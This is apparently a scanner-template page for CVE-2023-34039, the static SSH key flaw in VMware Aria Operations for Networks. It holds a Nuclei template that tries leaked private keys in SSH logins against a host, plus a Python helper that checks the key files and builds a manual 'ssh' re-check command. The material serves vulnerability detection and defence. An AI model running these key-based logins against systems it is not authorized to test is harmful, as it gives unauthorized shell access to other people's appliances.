VMWare Aria Operations - Remote Code Execution
ID: CVE-2023-34039
Severity: critical
Author: tarunKoyalwar
Tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023
Description
VMware Aria Operations for Networks (vRealize Network Insight) ships with a static SSH private key that is shared across installations instead of a key generated per appliance (VMware describes the flaw as an authentication bypass due to a lack of unique cryptographic key generation). Anyone holding the leaked key can authenticate to the appliance over SSH and run commands on it, which is why the template is rated critical (CVE-2023-34039, CVSS 3.1 score 9.8).
Affected versions: all 6.x releases from 6.0 to 6.10, per the template metadata; see VMSA-2023-0018 for the vendor's fixed versions.
YAML Source
```yaml
id: CVE-2023-34039

info:
  name: VMWare Aria Operations - Remote Code Execution
  author: tarunKoyalwar
  severity: critical
  description: |
    VMWare Aria Operations for Networks (vRealize Network Insight) Static SSH key RCE (CVE-2023-34039)
    Version: All versions from 6.0 to 6.10
  impact: |
    Successful exploitation of this vulnerability can lead to remote code execution or a complete system crash.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to fix this vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2023-34039.git
    - https://nvd.nist.gov/vuln/detail/CVE-2023-34039
    - http://packetstormsecurity.com/files/174452/VMWare-Aria-Operations-For-Networks-Remote-Code-Execution.html
    - http://packetstormsecurity.com/files/175320/VMWare-Aria-Operations-For-Networks-SSH-Private-Key-Exposure.html
    - https://www.vmware.com/security/advisories/VMSA-2023-0018.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-34039
    cwe-id: CWE-327
    epss-score: 0.9013
    epss-percentile: 0.98721
    cpe: cpe:2.3:a:vmware:aria_operations_for_networks:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: vmware
    product: aria_operations_for_networks
  tags: js,packetstorm,cve,vmware,aria,rce,fuzz,vrealize,cve2023

variables:
  keysDir: "helpers/payloads/cve-2023-34039-keys" # load all private keys from this directory

javascript:
  # init field can be used to make any preperations before the actual exploit
  # here we are reading all private keys from helpers folder and storing them in a list
  - init: |
      let m = require('nuclei/fs');
      let privatekeys = m.ReadFilesFromDir(keysDir)
      updatePayload('keys',privatekeys)

    # check if port is open before bruteforcing
    pre-condition: |
      isPortOpen(Host,Port)

    # actual exploit
    code: |
      let m = require('nuclei/ssh')
      let c = m.SSHClient()
      c.ConnectWithKey(Host,Port,'support@'+Host,key) // returns true if connection is successful

    args:
      Host: "{{Host}}"
      Port: "22"
      key: "{{keys}}"
      keysDir: "{{keysDir}}"

    payloads:
      # 'keys' will be updated by actual private keys after init is executed
      keys:
        - dummy1
        - dummy2

    threads: 10
    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - success && response
# digest: 4a0a0047304502202e5f8d9dc7673eacccc4e162a630616175f0c72e59e7cae968373d0bd2dc84630221009ae05dc4813f5ba6ccb9c109f607ce73b32b2abc00ed3501120bb3de53f6f91a:922c64590222798bb761d5b6d8e72950
```
Guide to check the vulnerabilities
This is a Nuclei JavaScript-protocol template, not an HTTP check. It first confirms that the target's SSH port is reachable (the pre-condition), then tries to authenticate with each private key that the init step loaded from `helpers/payloads/cve-2023-34039-keys`, ten keys in parallel, stopping at the first key the server accepts. A match therefore means a real SSH login succeeded with a leaked static key; this is an active authentication attempt against the host, so run it only against systems you are authorized to test.
Two things to check before running it:
- The keys directory must exist and contain the leaked private keys (see the Packet Storm "SSH Private Key Exposure" reference). The `dummy1`/`dummy2` entries under `payloads` are placeholders that init overwrites; if the directory cannot be read, no usable key is ever tried and the template cannot match.
- `Port` is fixed to `22` in `args`; an appliance exposing SSH on another port needs that value edited. The target is a host name or IP (`{{Host}}`), not a URL:
$ nuclei -u "HOST" -t "javascript/cves/2023/CVE-2023-34039.yaml"
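The init step above hands every file in the keys directory straight to the SSH client, so a wrong-format or passphrase-protected key silently never matches. The script below is an added example (not part of the nuclei template or the nuclei project) that inventories such a directory with the standard library only: it decodes the OpenSSH `openssh-key-v1` container far enough to report the key type, whether the key is encrypted, and the SHA256 fingerprint that `ssh-keygen -lf` prints, and it builds the plain OpenSSH command for re-verifying a hit by hand. The `support` user is taken from the template's `ConnectWithKey` call; the directory path, port and the fixture produced by `build_openssh_container()` are constructed for illustration.

```python
# Added example: inventory the helper key directory and build a manual re-check.
import base64
import hashlib
import os
import struct

OPENSSH_MAGIC = b"openssh-key-v1\x00"
PEM_HEADER = b"-----BEGIN OPENSSH PRIVATE KEY-----"
PEM_FOOTER = b"-----END OPENSSH PRIVATE KEY-----"


def _read_string(buf, offset):
    """Read one SSH wire 'string' (uint32 big-endian length + bytes)."""
    if offset + 4 > len(buf):
        raise ValueError("truncated key blob")
    (length,) = struct.unpack(">I", buf[offset:offset + 4])
    start = offset + 4
    if start + length > len(buf):
        raise ValueError("truncated key blob")
    return buf[start:start + length], start + length


def _write_string(data):
    return struct.pack(">I", len(data)) + data


def fingerprint(public_blob):
    """SHA256 fingerprint of a public-key blob, formatted like ssh-keygen -lf."""
    return "SHA256:" + base64.b64encode(hashlib.sha256(public_blob).digest()).decode().rstrip("=")


def parse_openssh_private_key(pem_bytes):
    """Return (key_type, encrypted, fingerprint); only the public section is decoded."""
    body = pem_bytes.strip()
    if not (body.startswith(PEM_HEADER) and body.endswith(PEM_FOOTER)):
        raise ValueError("not an OpenSSH-format private key")
    blob = base64.b64decode(b"".join(body[len(PEM_HEADER):-len(PEM_FOOTER)].split()))
    if not blob.startswith(OPENSSH_MAGIC):
        raise ValueError("bad openssh-key-v1 magic")
    off = len(OPENSSH_MAGIC)
    cipher, off = _read_string(blob, off)
    kdf, off = _read_string(blob, off)
    _kdf_options, off = _read_string(blob, off)
    if off + 4 > len(blob):
        raise ValueError("truncated key blob")
    (nkeys,) = struct.unpack(">I", blob[off:off + 4])
    if nkeys != 1:
        raise ValueError("expected one key, found %d" % nkeys)
    public_blob, _ = _read_string(blob, off + 4)  # private section stays opaque
    key_type, _ = _read_string(public_blob, 0)
    return key_type.decode(), cipher != b"none" or kdf != b"none", fingerprint(public_blob)


def inventory_keys(files):
    """Classify (name, bytes) pairs; an 'error' entry or encrypted=True means the
    template could never authenticate with that file (no passphrase is supplied)."""
    report = {}
    for name, data in files:
        try:
            key_type, encrypted, fp = parse_openssh_private_key(data)
            report[name] = {"type": key_type, "encrypted": encrypted, "fingerprint": fp}
        except ValueError as exc:
            report[name] = {"error": str(exc)}
    return report


def inventory_keys_dir(keys_dir):
    """Read every regular file in keys_dir, as the template's init does, and classify it."""
    files = []
    for name in sorted(os.listdir(keys_dir)):
        path = os.path.join(keys_dir, name)
        if os.path.isfile(path):
            with open(path, "rb") as fh:
                files.append((name, fh.read()))
    return inventory_keys(files)


def ssh_probe_argv(host, keyfile, port=22, user="support"):
    """argv for re-checking a hit with plain OpenSSH: BatchMode/IdentitiesOnly make a
    rejected key fail fast instead of prompting; running only `true` proves the key
    authenticates without touching anything on the appliance."""
    return ["ssh", "-p", str(port), "-i", keyfile,
            "-o", "BatchMode=yes", "-o", "IdentitiesOnly=yes",
            "-o", "StrictHostKeyChecking=no", "-o", "ConnectTimeout=5",
            "%s@%s" % (user, host), "true"]


def build_openssh_container(key_type, public_fields, cipher=b"none", kdf=b"none"):
    """Constructed fixture: real public section, dummy private section (not a usable key)."""
    public_blob = _write_string(key_type.encode()) + b"".join(_write_string(f) for f in public_fields)
    blob = (OPENSSH_MAGIC + _write_string(cipher) + _write_string(kdf) + _write_string(b"")
            + struct.pack(">I", 1) + _write_string(public_blob) + _write_string(b"\x00" * 16))
    b64 = base64.b64encode(blob)
    lines = [b64[i:i + 70] for i in range(0, len(b64), 70)]
    return b"\n".join([PEM_HEADER] + lines + [PEM_FOOTER]) + b"\n"


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "helpers/payloads/cve-2023-34039-keys"
    for name, info in inventory_keys_dir(target).items():
        print(name, info)
```

Run it against the keys directory before a scan to confirm every file parses and none is encrypted. The same fingerprints are what a defender can compare against `ssh-keygen -lf` output for the authorized_keys file of the affected account on an appliance, which answers the question "is the leaked key still trusted here" without attempting a login.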